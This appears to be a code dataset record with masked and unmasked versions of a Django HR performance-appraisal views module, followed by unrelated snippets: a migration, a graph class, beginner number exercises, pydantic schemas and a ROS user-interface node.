context\n\n\nclass ListPerformanceView(ListView):\n model = Performance\n context_object_name = 'performances'\n template_name = 'hrm/performance/performance_list.html'\n\n def get_context_data(self, **kwargs):\n context = super(ListPerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user=self.request.user.id)\n return context\n\n\nclass UpdatePerformanceView(SuccessMessageMixin, UpdateView):\n model = Performance\n fields = 'employee', 'start_date', 'finish_date', 'objective'\n success_message = 'Successfully! 
Updated an appraisal'\n context_object_name = 'performance'\n template_name = 'hrm/performance/performance_form.html'\n\n def get_context_data(self, **kwargs):\n context = super(UpdatePerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user=self.request.user.id)\n return context\n\n\nclass DetailPerformanceView(DetailView):\n model = Performance\n context_object_name = 'performance'\n template_name = 'hrm/performance/performance_details.html'\n\n def get_context_data(self, **kwargs):\n context = super(DetailPerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user=self.request.user.id)\n return context\n\n\nclass DeletePerformanceView(SuccessMessageMixin, DeleteView):\n model = Performance\n success_message = 'Successfully! Deleted an appraisal.'\n success_url = reverse_lazy('hrm:perfom_list')\n template_name = 'hrm/performance/performance_delete.html'\n\n def get_context_data(self, **kwargs):\n context = super(DeletePerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user=self.request.user.id)\n return context\n\n\n<mask token>\n\n\ndef show_employee_perfomance_control(request):\n check_user_login(request)\n employee = Employee.objects.get(user=User.objects.get(username=request.\n session['username']).id)\n perform = Performance.objects.filter(employee=employee.id)\n print(perform)\n if perform is None:\n return HttpResponseRedirect(reverse('hrm:hrm_index'))\n return render(request, 'hrm/performance/employee_performance.html', {\n 'employee': employee, 'performances': perform})\n\n\n<mask token>\n",
"step-4": "from django.shortcuts import render, get_object_or_404\nfrom django.views.generic import ListView, CreateView, UpdateView, DeleteView, DetailView\nfrom accounts.models import Employee\nfrom leave.models import ApplyLeave\nfrom departments.models import Department, Position\nfrom django.contrib.auth.models import User\nfrom hrm.models import Performance\nfrom django.urls import reverse_lazy, reverse\nfrom hrm.forms import PerformanceForm\nfrom django.http import HttpResponseRedirect\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.contrib import messages\nfrom helpers.help import check_user_login\n\n\ndef index(request):\n if not request.session.get('username'):\n return HttpResponseRedirect(reverse('accounts:login'))\n applied_leaves = ApplyLeave.objects.count()\n employees = Employee.objects.count()\n positions = Position.objects.count()\n departments = Department.objects.count()\n user = User.objects.get(username=request.session['username'])\n employee = Employee.objects.get(user=user.id)\n return render(request, 'hrm/dashboard.html', {'employees': employees,\n 'positions': positions, 'departments': departments,\n 'applied_leaves': applied_leaves, 'employee': employee, 'user': user})\n\n\n<mask token>\n\n\nclass CreatePerformanceView(SuccessMessageMixin, CreateView):\n model = Performance\n fields = 'employee', 'start_date', 'finish_date', 'objective'\n success_message = 'Successfully! 
Created employee and appraisal...'\n template_name = 'hrm/performance/performance_form.html'\n\n def get_context_data(self, **kwargs):\n context = super(CreatePerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user=self.request.user.id)\n return context\n\n\nclass ListPerformanceView(ListView):\n model = Performance\n context_object_name = 'performances'\n template_name = 'hrm/performance/performance_list.html'\n\n def get_context_data(self, **kwargs):\n context = super(ListPerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user=self.request.user.id)\n return context\n\n\nclass UpdatePerformanceView(SuccessMessageMixin, UpdateView):\n model = Performance\n fields = 'employee', 'start_date', 'finish_date', 'objective'\n success_message = 'Successfully! Updated an appraisal'\n context_object_name = 'performance'\n template_name = 'hrm/performance/performance_form.html'\n\n def get_context_data(self, **kwargs):\n context = super(UpdatePerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user=self.request.user.id)\n return context\n\n\nclass DetailPerformanceView(DetailView):\n model = Performance\n context_object_name = 'performance'\n template_name = 'hrm/performance/performance_details.html'\n\n def get_context_data(self, **kwargs):\n context = super(DetailPerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user=self.request.user.id)\n return context\n\n\nclass DeletePerformanceView(SuccessMessageMixin, DeleteView):\n model = Performance\n success_message = 'Successfully! 
Deleted an appraisal.'\n success_url = reverse_lazy('hrm:perfom_list')\n template_name = 'hrm/performance/performance_delete.html'\n\n def get_context_data(self, **kwargs):\n context = super(DeletePerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user=self.request.user.id)\n return context\n\n\n<mask token>\n\n\ndef show_employee_perfomance_control(request):\n check_user_login(request)\n employee = Employee.objects.get(user=User.objects.get(username=request.\n session['username']).id)\n perform = Performance.objects.filter(employee=employee.id)\n print(perform)\n if perform is None:\n return HttpResponseRedirect(reverse('hrm:hrm_index'))\n return render(request, 'hrm/performance/employee_performance.html', {\n 'employee': employee, 'performances': perform})\n\n\n<mask token>\n\n\ndef perfomance_notes(request, pk):\n form = PerformanceForm(request.POST or None, instance=get_object_or_404\n (Performance, pk=pk))\n employee = Employee.objects.get(user=User.objects.get(username=request.\n session['username']).id)\n if request.method == 'POST':\n if form.is_valid():\n form.save()\n messages.success(request,\n 'Successfully! Added notes on what you have done.')\n return HttpResponseRedirect(reverse('hrm:perfom_employee'))\n return render(request, 'hrm/performance/performance_notes.html', {\n 'form': form, 'employee': employee})\n\n\ndef appraisal(request, pk):\n perform = Performance.objects.get(id=pk)\n perform.status = 1\n perform.save()\n messages.success(request, 'Successfully! Appraised employee work....')\n return HttpResponseRedirect(reverse('hrm:perfom_list'))\n",
"step-5": "from django.shortcuts import render, get_object_or_404\nfrom django.views.generic import ListView, CreateView, UpdateView, DeleteView, DetailView\nfrom accounts.models import Employee\nfrom leave.models import ApplyLeave \nfrom departments.models import Department, Position \nfrom django.contrib.auth.models import User\nfrom hrm.models import Performance \nfrom django.urls import reverse_lazy, reverse\nfrom hrm.forms import PerformanceForm\nfrom django.http import HttpResponseRedirect\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.contrib import messages\nfrom helpers.help import check_user_login\n# Create your views here.\n\ndef index(request):\n if not request.session.get('username'):\n return HttpResponseRedirect(reverse(\"accounts:login\"))\n\n applied_leaves = ApplyLeave.objects.count()\n employees = Employee.objects.count()\n positions = Position.objects.count()\n departments = Department.objects.count()\n user = User.objects.get(username = request.session['username'])\n employee = Employee.objects.get(user = user.id)\n\n return render(request, \"hrm/dashboard.html\", \n {'employees': employees, 'positions': positions, 'departments': departments,\n 'applied_leaves': applied_leaves, \"employee\": employee, \"user\":user})\n\n\n'''\nPerfomance Control \n'''\n\nclass CreatePerformanceView(SuccessMessageMixin, CreateView):\n model = Performance \n fields = ('employee', 'start_date', 'finish_date', 'objective')\n success_message = \"Successfully! 
Created employee and appraisal...\"\n template_name = \"hrm/performance/performance_form.html\"\n def get_context_data(self, **kwargs):\n context = super(CreatePerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user = self.request.user.id)\n return context \n\n\nclass ListPerformanceView(ListView):\n model = Performance \n context_object_name = \"performances\"\n template_name = \"hrm/performance/performance_list.html\"\n def get_context_data(self, **kwargs):\n context = super(ListPerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user = self.request.user.id)\n return context \n\n\nclass UpdatePerformanceView(SuccessMessageMixin, UpdateView):\n model = Performance\n fields = ('employee', 'start_date', 'finish_date', 'objective')\n success_message = \"Successfully! Updated an appraisal\"\n context_object_name = \"performance\"\n template_name = \"hrm/performance/performance_form.html\"\n def get_context_data(self, **kwargs):\n context = super(UpdatePerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user = self.request.user.id)\n return context\n\n\nclass DetailPerformanceView(DetailView):\n model = Performance\n context_object_name = \"performance\"\n template_name = \"hrm/performance/performance_details.html\"\n def get_context_data(self, **kwargs):\n context = super(DetailPerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user = self.request.user.id)\n return context\n\n\nclass DeletePerformanceView(SuccessMessageMixin, DeleteView):\n model = Performance\n success_message = \"Successfully! 
Deleted an appraisal.\"\n success_url = reverse_lazy(\"hrm:perfom_list\")\n template_name = \"hrm/performance/performance_delete.html\"\n def get_context_data(self, **kwargs):\n context = super(DeletePerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user = self.request.user.id)\n return context\n\n'''\nShowing an employees perfomance control\n'''\ndef show_employee_perfomance_control(request):\n check_user_login(request)\n employee = Employee.objects.get(user= User.objects.get(username = request.session['username']).id)\n perform = Performance.objects.filter(employee = employee.id)\n print(perform)\n if perform is None:\n return HttpResponseRedirect(reverse(\"hrm:hrm_index\"))\n return render(request, \"hrm/performance/employee_performance.html\", {'employee': employee, 'performances': perform})\n\n\n'''\nEmployee Provide Notes for his perfomance\n'''\n\ndef perfomance_notes(request, pk):\n form = PerformanceForm(request.POST or None,instance = get_object_or_404(Performance, pk=pk))\n employee = Employee.objects.get(user= User.objects.get(username = request.session['username']).id)\n if request.method == \"POST\":\n if form.is_valid():\n form.save()\n messages.success(request, \"Successfully! Added notes on what you have done.\")\n return HttpResponseRedirect(reverse('hrm:perfom_employee'))\n return render(request, \"hrm/performance/performance_notes.html\", {'form': form, 'employee': employee})\n\ndef appraisal(request, pk):\n perform = Performance.objects.get(id = pk)\n perform.status = 1\n perform.save()\n messages.success(request, \"Successfully! Appraised employee work....\")\n return HttpResponseRedirect(reverse('hrm:perfom_list'))\n",
"step-ids": [
7,
12,
17,
20,
21
]
}
|
[
7,
12,
17,
20,
21
] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.utils.timezone import utc
import datetime
class Migration(migrations.Migration):
dependencies = [
('notesapp', '0008_auto_20150819_1222'),
]
operations = [
migrations.RenameField(
model_name='note',
old_name='txtcolor',
new_name='text',
),
migrations.AlterField(
model_name='note',
name='created_date',
field=models.DateTimeField(default=datetime.datetime(2015, 8, 19, 12, 25, 8, 579538, tzinfo=utc), editable=False),
),
]
|
normal
|
{
"blob_id": "51af54c55834c4bdb8e1cbe4ac55b86bdc61bf4d",
"index": 458,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('notesapp', '0008_auto_20150819_1222')]\n operations = [migrations.RenameField(model_name='note', old_name=\n 'txtcolor', new_name='text'), migrations.AlterField(model_name=\n 'note', name='created_date', field=models.DateTimeField(default=\n datetime.datetime(2015, 8, 19, 12, 25, 8, 579538, tzinfo=utc),\n editable=False))]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import models, migrations\nfrom django.utils.timezone import utc\nimport datetime\n\n\nclass Migration(migrations.Migration):\n dependencies = [('notesapp', '0008_auto_20150819_1222')]\n operations = [migrations.RenameField(model_name='note', old_name=\n 'txtcolor', new_name='text'), migrations.AlterField(model_name=\n 'note', name='created_date', field=models.DateTimeField(default=\n datetime.datetime(2015, 8, 19, 12, 25, 8, 579538, tzinfo=utc),\n editable=False))]\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.utils.timezone import utc\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('notesapp', '0008_auto_20150819_1222'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='note',\n old_name='txtcolor',\n new_name='text',\n ),\n migrations.AlterField(\n model_name='note',\n name='created_date',\n field=models.DateTimeField(default=datetime.datetime(2015, 8, 19, 12, 25, 8, 579538, tzinfo=utc), editable=False),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
class Graph():
def __init__(self, nvertices):
self.N = nvertices
self.graph = [[0 for column in range(nvertices)]
for row in range(nvertices)]
self.V = ['0' for column in range(nvertices)]
def nameVertex(self):
for i in range(self.N):
print("Qual o rotúlo do vértice %i?"%(i))
self.V[i]=input()
def setEdge(self,u,v,w):
self.graph[u][v]=w
self.graph[v][u]=w
def loadEdges(self):
for i in range(self.N):
for j in range(self.N):
if i>j:
print("Qual o peso entre %c e %c?"%
(self.V[i],self.V[j]))
self.setEdge(i,j,input())
print('Qual o número de vértices?')
n = int(input())
g = Graph(n)
g1 = Graph(n-1)
print(g.graph)
g.nameVertex()
g.loadEdges()
print(g.graph)
|
normal
|
{
"blob_id": "51a8b963047215bf864eb4a3e62beb5741dfbafe",
"index": 8572,
"step-1": "class Graph:\n\n def __init__(self, nvertices):\n self.N = nvertices\n self.graph = [[(0) for column in range(nvertices)] for row in range\n (nvertices)]\n self.V = ['0' for column in range(nvertices)]\n\n def nameVertex(self):\n for i in range(self.N):\n print('Qual o rotúlo do vértice %i?' % i)\n self.V[i] = input()\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "class Graph:\n\n def __init__(self, nvertices):\n self.N = nvertices\n self.graph = [[(0) for column in range(nvertices)] for row in range\n (nvertices)]\n self.V = ['0' for column in range(nvertices)]\n\n def nameVertex(self):\n for i in range(self.N):\n print('Qual o rotúlo do vértice %i?' % i)\n self.V[i] = input()\n\n def setEdge(self, u, v, w):\n self.graph[u][v] = w\n self.graph[v][u] = w\n\n def loadEdges(self):\n for i in range(self.N):\n for j in range(self.N):\n if i > j:\n print('Qual o peso entre %c e %c?' % (self.V[i], self.V[j])\n )\n self.setEdge(i, j, input())\n\n\n<mask token>\n",
"step-3": "class Graph:\n\n def __init__(self, nvertices):\n self.N = nvertices\n self.graph = [[(0) for column in range(nvertices)] for row in range\n (nvertices)]\n self.V = ['0' for column in range(nvertices)]\n\n def nameVertex(self):\n for i in range(self.N):\n print('Qual o rotúlo do vértice %i?' % i)\n self.V[i] = input()\n\n def setEdge(self, u, v, w):\n self.graph[u][v] = w\n self.graph[v][u] = w\n\n def loadEdges(self):\n for i in range(self.N):\n for j in range(self.N):\n if i > j:\n print('Qual o peso entre %c e %c?' % (self.V[i], self.V[j])\n )\n self.setEdge(i, j, input())\n\n\nprint('Qual o número de vértices?')\n<mask token>\nprint(g.graph)\ng.nameVertex()\ng.loadEdges()\nprint(g.graph)\n",
"step-4": "class Graph:\n\n def __init__(self, nvertices):\n self.N = nvertices\n self.graph = [[(0) for column in range(nvertices)] for row in range\n (nvertices)]\n self.V = ['0' for column in range(nvertices)]\n\n def nameVertex(self):\n for i in range(self.N):\n print('Qual o rotúlo do vértice %i?' % i)\n self.V[i] = input()\n\n def setEdge(self, u, v, w):\n self.graph[u][v] = w\n self.graph[v][u] = w\n\n def loadEdges(self):\n for i in range(self.N):\n for j in range(self.N):\n if i > j:\n print('Qual o peso entre %c e %c?' % (self.V[i], self.V[j])\n )\n self.setEdge(i, j, input())\n\n\nprint('Qual o número de vértices?')\nn = int(input())\ng = Graph(n)\ng1 = Graph(n - 1)\nprint(g.graph)\ng.nameVertex()\ng.loadEdges()\nprint(g.graph)\n",
"step-5": "class Graph(): \n \n def __init__(self, nvertices): \n self.N = nvertices \n self.graph = [[0 for column in range(nvertices)] \n for row in range(nvertices)] \n self.V = ['0' for column in range(nvertices)]\n\n def nameVertex(self):\n for i in range(self.N):\n print(\"Qual o rotúlo do vértice %i?\"%(i))\n self.V[i]=input()\n\n def setEdge(self,u,v,w):\n self.graph[u][v]=w\n self.graph[v][u]=w\n\n def loadEdges(self):\n for i in range(self.N):\n for j in range(self.N):\n if i>j:\n print(\"Qual o peso entre %c e %c?\"%\n (self.V[i],self.V[j]))\n self.setEdge(i,j,input())\n \n \n\n \nprint('Qual o número de vértices?')\nn = int(input())\ng = Graph(n)\ng1 = Graph(n-1)\nprint(g.graph)\ng.nameVertex()\ng.loadEdges()\nprint(g.graph)\n\n\n",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
##armstrong number##
##n= int(input('enter a number '))
##a=n
##s=0
##
##while n>0:
## rem= n%10
## s= s+rem*rem*rem
## n= n//10
##if a==s:
## print(a,' is an armstrong number')
##else:
## print(a,' is not an armstrong number')
##palindrome or not##
##n= int(input('enter a number '))
##a=n
##rev=0
##
##while n>0:
## rem= n%10
## rev= rev*10+rem
## n= n//10
##if a==rev:
## print(a,' is a palindrome number')
##else:
## print(a,' is not a palindrome number')
##factorial of a number using while loop##
##n= int(input('enter a number '))
##i=1
##a=n
##fact=1
##
##while i<=n:##n>0
## fact*= n*i##fact*=n
## n-=1
##print(fact,' is the factorial of ',a)
##factorial of a number using for loop##
##n= int(input('enter a number '))
##a=n
##fact=1
##
##for i in range(1,n+1):##(n,0,-1)
## fact*=i
##print(fact,' is the factorial of ',a)
##harshed number ##
##n= int(input('enter a number '))
##a=n
##s=0
##
##while n>0:
## rem= n%10
## s+=rem
## n//=10
##print(s,' is the sum of ',a)
##if a%s==0:
## print(a,' is a harshed number')
##else:
## print(a,' is not a harshed number')
##fibonocci series using while loop##
##n= int(input('enter a range '))
##a=0
##b=1
##print(a,b,end=" ")
##count=3
##
##while count<=n:
## s= a+b
## print(s,end=" ")
## a=b
## b=s
## count+=1
##fibonocci series using for loop##
##n= int(input('enter a range '))
##a=0
##b=1
##print(a,b,end=' ')
##
##for count in range(1,n-1):##(2,n)
## s= a+b
## print(s,end=' ')
## a=b
## b=s
##previous number of fibnocci series from the given number##
##n= int(input('enter a number '))
##a=0
##b=1
##for i in range(3,n+1):
## s=a+b
## a=b
## b=s
## if b>=n:
## print(a)
## break
##next number of fibnocci series from the given number##
##n= int(input('enter a number '))
##a=0
##b=1
##for i in range(3,n+1):
## s=a+b
## a=b
## b=s
## if b>=n:
## print(b)
## break
##perfect numbers using for loop##
##n= int(input('enter a number '))
##a=n
##s=0
##
##for i in range(1,n):#(1,(n//2)+1)#
## div=n%i
## if n%i==0:
## s+=i
## else:
## continue
##
##if s==a:
## print(a,' is a perfect number')
##else:
## print(a,' is not a perfect number')
##perfect numbers using while loop##
##n= int(input('enter a number '))
##a=n
##s=0
##i=1
##
##while i<n:
## if n%i==0:
## s+=i
## i+=1
##
##if s==a:
## print(a,' is a perfect number')
##else:
## print(a,' is not a perfect number')
|
normal
|
{
"blob_id": "6be285f9c48a20934c1846785232a73373c7d547",
"index": 1043,
"step-1": "##armstrong number##\r\n##n= int(input('enter a number '))\r\n##a=n\r\n##s=0\r\n##\r\n##while n>0:\r\n## rem= n%10\r\n## s= s+rem*rem*rem\r\n## n= n//10\r\n##if a==s:\r\n## print(a,' is an armstrong number')\r\n##else:\r\n## print(a,' is not an armstrong number')\r\n\r\n\r\n\r\n\r\n\r\n##palindrome or not##\r\n##n= int(input('enter a number '))\r\n##a=n\r\n##rev=0\r\n##\r\n##while n>0:\r\n## rem= n%10\r\n## rev= rev*10+rem\r\n## n= n//10\r\n##if a==rev:\r\n## print(a,' is a palindrome number')\r\n##else:\r\n## print(a,' is not a palindrome number')\r\n\r\n\r\n\r\n\r\n\r\n##factorial of a number using while loop##\r\n##n= int(input('enter a number '))\r\n##i=1\r\n##a=n\r\n##fact=1\r\n##\r\n##while i<=n:##n>0\r\n## fact*= n*i##fact*=n\r\n## n-=1\r\n##print(fact,' is the factorial of ',a)\r\n\r\n\r\n\r\n\r\n\r\n##factorial of a number using for loop##\r\n##n= int(input('enter a number '))\r\n##a=n\r\n##fact=1\r\n##\r\n##for i in range(1,n+1):##(n,0,-1)\r\n## fact*=i\r\n##print(fact,' is the factorial of ',a)\r\n \r\n\r\n\r\n\r\n\r\n##harshed number ##\r\n##n= int(input('enter a number '))\r\n##a=n\r\n##s=0\r\n##\r\n##while n>0:\r\n## rem= n%10\r\n## s+=rem\r\n## n//=10\r\n##print(s,' is the sum of ',a)\r\n##if a%s==0:\r\n## print(a,' is a harshed number')\r\n##else:\r\n## print(a,' is not a harshed number')\r\n\r\n\r\n\r\n\r\n\r\n##fibonocci series using while loop##\r\n##n= int(input('enter a range '))\r\n##a=0\r\n##b=1\r\n##print(a,b,end=\" \")\r\n##count=3\r\n##\r\n##while count<=n:\r\n## s= a+b\r\n## print(s,end=\" \")\r\n## a=b\r\n## b=s\r\n## count+=1\r\n\r\n\r\n\r\n\r\n\r\n##fibonocci series using for loop##\r\n##n= int(input('enter a range '))\r\n##a=0\r\n##b=1\r\n##print(a,b,end=' ')\r\n##\r\n##for count in range(1,n-1):##(2,n)\r\n## s= a+b\r\n## print(s,end=' ')\r\n## a=b\r\n## b=s\r\n\r\n\r\n\r\n\r\n\r\n##previous number of fibnocci series from the given number##\r\n##n= int(input('enter a number '))\r\n##a=0\r\n##b=1\r\n##for i in 
range(3,n+1):\r\n## s=a+b\r\n## a=b\r\n## b=s\r\n## if b>=n:\r\n## print(a)\r\n## break\r\n\r\n\r\n\r\n\r\n\r\n##next number of fibnocci series from the given number##\r\n##n= int(input('enter a number '))\r\n##a=0\r\n##b=1\r\n##for i in range(3,n+1):\r\n## s=a+b\r\n## a=b\r\n## b=s\r\n## if b>=n:\r\n## print(b)\r\n## break\r\n\r\n\r\n\r\n\r\n\r\n##perfect numbers using for loop##\r\n##n= int(input('enter a number '))\r\n##a=n\r\n##s=0\r\n##\r\n##for i in range(1,n):#(1,(n//2)+1)#\r\n## div=n%i\r\n## if n%i==0:\r\n## s+=i\r\n## else:\r\n## continue\r\n## \r\n##if s==a:\r\n## print(a,' is a perfect number')\r\n##else:\r\n## print(a,' is not a perfect number')\r\n\r\n\r\n\r\n\r\n\r\n##perfect numbers using while loop##\r\n##n= int(input('enter a number '))\r\n##a=n\r\n##s=0\r\n##i=1\r\n##\r\n##while i<n:\r\n## if n%i==0:\r\n## s+=i\r\n## i+=1\r\n## \r\n##if s==a:\r\n## print(a,' is a perfect number')\r\n##else:\r\n## print(a,' is not a perfect number')\r\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
1
]
}
|
[
1
] |
<|reserved_special_token_0|>
class UserCreate(UserBase):
password: str
class User(UserBase):
id: int
class Config:
orm_mode = True
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BinCreate(BinBase):
owner_id: int
password: str
class Bin(BinBase):
id: int
class Config:
orm_mode = True
class UserBase(BaseModel):
username: str
class UserCreate(UserBase):
password: str
class User(UserBase):
id: int
class Config:
orm_mode = True
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BinBase(BaseModel):
name: str = None
title: str = None
class BinCreate(BinBase):
owner_id: int
password: str
class Bin(BinBase):
id: int
class Config:
orm_mode = True
class UserBase(BaseModel):
username: str
class UserCreate(UserBase):
password: str
class User(UserBase):
id: int
class Config:
orm_mode = True
<|reserved_special_token_1|>
from typing import List
from pydantic import BaseModel
class BinBase(BaseModel):
name: str = None
title: str = None
class BinCreate(BinBase):
owner_id: int
password: str
class Bin(BinBase):
id: int
class Config:
orm_mode = True
class UserBase(BaseModel):
username: str
class UserCreate(UserBase):
password: str
class User(UserBase):
id: int
class Config:
orm_mode = True
<|reserved_special_token_1|>
from typing import List
from pydantic import BaseModel
class BinBase(BaseModel):
name: str = None
title: str = None
class BinCreate(BinBase):
owner_id: int
password: str
class Bin(BinBase):
id: int
# TODO: token?
class Config():
orm_mode = True
class UserBase(BaseModel):
username: str
class UserCreate(UserBase):
password: str
class User(UserBase):
id: int
# TODO: password?
# bins: List[Bin] = []
class Config():
orm_mode = True
|
flexible
|
{
"blob_id": "1c0f194bbdc6f7e3e4feb114e521aa958f11e83e",
"index": 3263,
"step-1": "<mask token>\n\n\nclass UserCreate(UserBase):\n password: str\n\n\nclass User(UserBase):\n id: int\n\n\n class Config:\n orm_mode = True\n",
"step-2": "<mask token>\n\n\nclass BinCreate(BinBase):\n owner_id: int\n password: str\n\n\nclass Bin(BinBase):\n id: int\n\n\n class Config:\n orm_mode = True\n\n\nclass UserBase(BaseModel):\n username: str\n\n\nclass UserCreate(UserBase):\n password: str\n\n\nclass User(UserBase):\n id: int\n\n\n class Config:\n orm_mode = True\n",
"step-3": "<mask token>\n\n\nclass BinBase(BaseModel):\n name: str = None\n title: str = None\n\n\nclass BinCreate(BinBase):\n owner_id: int\n password: str\n\n\nclass Bin(BinBase):\n id: int\n\n\n class Config:\n orm_mode = True\n\n\nclass UserBase(BaseModel):\n username: str\n\n\nclass UserCreate(UserBase):\n password: str\n\n\nclass User(UserBase):\n id: int\n\n\n class Config:\n orm_mode = True\n",
"step-4": "from typing import List\nfrom pydantic import BaseModel\n\n\nclass BinBase(BaseModel):\n name: str = None\n title: str = None\n\n\nclass BinCreate(BinBase):\n owner_id: int\n password: str\n\n\nclass Bin(BinBase):\n id: int\n\n\n class Config:\n orm_mode = True\n\n\nclass UserBase(BaseModel):\n username: str\n\n\nclass UserCreate(UserBase):\n password: str\n\n\nclass User(UserBase):\n id: int\n\n\n class Config:\n orm_mode = True\n",
"step-5": "from typing import List\nfrom pydantic import BaseModel\n\nclass BinBase(BaseModel):\n name: str = None\n title: str = None\n\n\nclass BinCreate(BinBase):\n owner_id: int\n password: str\n\n\nclass Bin(BinBase):\n id: int\n # TODO: token?\n\n class Config():\n orm_mode = True\n\n\nclass UserBase(BaseModel):\n username: str\n\n\nclass UserCreate(UserBase):\n password: str\n\n\nclass User(UserBase):\n id: int\n # TODO: password?\n # bins: List[Bin] = []\n\n class Config():\n orm_mode = True\n",
"step-ids": [
2,
5,
6,
7,
8
]
}
|
[
2,
5,
6,
7,
8
] |
#! /usr/bin/env python
# import ros stuff
import rospy
from std_srvs.srv import *
#to check if the service is active
active_ = False
def unable_service(req):
"""
This function contains the variable declared above that is
used to enable the service.
"""
global active_
active_ = req.data
res = SetBoolResponse()
res.success = True
res.message = 'Done!'
return res
def getInput():
	"""
	Prompt the user for the robot's next behaviour (an integer 1-5).

	Reads the previously selected behaviour from the '/input' ROS
	parameter and keeps prompting until the user enters a valid value
	different from the previous one, which is then stored back into
	'/input'.  Also clears the module-level ``active_`` flag, so the
	service must be triggered again before the next prompt.
	"""
	global active_

	# Disable the service until it is explicitly re-enabled.
	active_ = False

	# Read the previously chosen behaviour so a repeat can be rejected.
	prev_input_ = rospy.get_param('/input')
	input_ = prev_input_

	# Loop until the user picks a valid (1-5) value different from the
	# previous one; the condition is initially true because input_ starts
	# equal to prev_input_.
	while (prev_input_ == input_) or (input_ > 5 or input_ < 1):
		if input_ > 5 or input_ < 1: 
			# The last entry was out of range; warn the user (Python 2 print).
			print "Unknown input, please try again" 

		# Show the menu of the five available behaviours.
		print("Please select one of the following senteces\n")
		print("1 - Move the robot randomly in the environment, by choosing one of six possible target positions\n")
		print("2 - The user can chose the next target position\n")
		print("3 - Start following the external walls\n")
		print("4 - Stop the robot in the last position\n")
		print("5 - Change the planning algorithm from move_base to bug0 and vice versa\n")

		# Read the choice typed by the user (Python 2 raw_input).
		input_ = (int(raw_input("Please select a number between 1 and 5: ")))

	# Persist the valid choice where the other nodes read it.
	if input_ >= 1 and input_ <= 5:
		rospy.set_param('/input', input_)
def main():
    """
    Entry point of the user-interface node.

    Spins at 1 Hz.  When the /user_interface_service service has been
    triggered (``active_`` is True) it prompts the user for a new
    behaviour via getInput(); otherwise it idles, downgrading a selected
    behaviour 2 to behaviour 4 on the '/input' parameter.
    """
    global active_

    rospy.init_node('user_interface')

    # Service through which other nodes enable the input prompt.
    service = rospy.Service('/user_interface_service', SetBool, unable_service)

    loop_rate = rospy.Rate(1)
    while not rospy.is_shutdown():
        if active_:
            # Service triggered: ask the user for a new behaviour.
            getInput()
            loop_rate.sleep()
            continue

        # Service inactive: idle for one cycle, replacing behaviour 2
        # with behaviour 4 if it is currently selected.
        loop_rate.sleep()
        if rospy.get_param("/input") == 2:
            rospy.set_param("/input", 4)
# Start the node; swallow the ROSInterruptException raised on node
# shutdown (e.g. Ctrl-C) so the script exits quietly.
if __name__ == '__main__':
    try:
        main()
    except rospy.ROSInterruptException:
        pass
|
normal
|
{
"blob_id": "0f6737b9e9e9a13d75c20352e9ef9c1db6c0c8a3",
"index": 828,
"step-1": "#! /usr/bin/env python\n\n# import ros stuff\nimport rospy\nfrom std_srvs.srv import *\n\n#to check if the service is active\nactive_ = False\n\ndef unable_service(req):\n\t\"\"\"\n\tThis function contains the variable declared above that is\n\tused to enable the service.\n\t\"\"\"\n\tglobal active_\n \n\tactive_ = req.data\n\tres = SetBoolResponse()\n\tres.success = True\n\tres.message = 'Done!'\n\n\treturn res\n\t\ndef getInput():\n\t\"\"\"\n\tThis function get the input, given by the user, on which of the 5\n\tbehaviors proposed, the robot must follow.\n\tIf one of the input chosen by the user is already active, the \n\tfunction doesn't ask to give again the input.\n\t\"\"\"\t\n\tglobal active_\n\n\t#to disable the service \n\tactive_ = False \n\t\n\t# reading the previous input\n\tprev_input_ = rospy.get_param('/input')\n\tinput_ = prev_input_\n\t\n\t#in order to make the user to choose one of the 5 possible inputs\n\twhile (prev_input_ == input_) or (input_ > 5 or input_ < 1):\n\t\tif input_ > 5 or input_ < 1: \n\t\t\t#in the case in which the user make another selection\n\t\t\tprint \"Unknown input, please try again\" \n\t\t\n\t\t#propose to the user which are the real possibilities\n\t\tprint(\"Please select one of the following senteces\\n\")\n\t\tprint(\"1 - Move the robot randomly in the environment, by choosing one of six possible target positions\\n\")\n\t\tprint(\"2 - The user can chose the next target position\\n\")\n\t\tprint(\"3 - Start following the external walls\\n\")\n\t\tprint(\"4 - Stop the robot in the last position\\n\")\n\t\tprint(\"5 - Change the planning algorithm from move_base to bug0 and vice versa\\n\")\n\n\t\t#read the input typed by the user\t\n\t\tinput_ = (int(raw_input(\"Please select a number between 1 and 5: \")))\n\n\t#set the choice made by the user\n\tif input_ >= 1 and input_ <= 5:\n\t\trospy.set_param('/input', input_)\n\ndef main():\n\t\"\"\"\t\n\tThe main function allows the user to choose the 